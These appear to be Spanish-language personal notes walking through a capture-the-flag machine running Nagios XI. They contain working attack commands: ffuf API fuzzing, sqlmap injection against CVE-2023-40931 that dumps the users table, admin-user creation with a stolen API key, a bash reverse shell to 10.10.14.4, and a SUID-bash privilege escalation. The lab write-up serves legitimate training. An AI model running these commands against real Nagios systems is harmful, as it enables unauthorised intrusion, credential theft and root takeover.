Nagios

Nagios API -> Automated_Host_Management.pdf

Fuzzear endpoints a partir de :

https://nagios.monitored.htb/nagiosxi/api

GET y POST

ffuf -u https://nagios.monitored.htb/nagiosxi/api/v1/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  -t 150 -fs 32

ffuf -u https://nagios.monitored.htb/nagiosxi/api/v1/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  -t 150 -fs 32 -X POST

GitHub - chrislockard/api_wordlist: A wordlist of API names for web application assessments

POST /nagiosxi/api/v1/authenticate

username=svc&password=XjH7VCehowpR1xZB

https://nagios.monitored.htb/nagiosxi/?token=4974cd07de85be10303478189d2a1bd0215bff3d

Nagios XI 5.11.0 -> CVE-2023-40931

!Apuntes/()01598301Fotos/image-20240508194342678.webp!Apuntes/()01598301Fotos/image-20240508194415753.webp

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" -p id --cookie "nagiosxi=bspu3ilq508jivkicfqofjo29g" --batch --threads 10

Dumpear tabla de users

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" -p id --cookie "nagiosxi=a4i4msg08i966d4ghlrhqrj963" --batch --threads 10 --dump -T xi_users

Si no podemos crackear el hash de admin , podemos usar su api key para crear un nuevo usuario:

curl -d "username=m0b&password=m0bm0b&name=m0b&email=m0b@monitored.htb&auth_level=admin&force_pw_change=0" -k 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL'

RCE como admin

Configure -> Core Config Manager -> Commands

Creamos rev shell

bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'

Core Config -> Hosts -> Localhost -> Check commands -> Run check command

ROOT

Para escalar podemos cambiar el binario de nagios /usr/local/nagios/bin/nagios por:

#!/bin/bash

chmod u+s /bin/bash

Restablecer el servicio

sudo /usr/local/nagiosxi/scripts/manage_services.sh restart nagios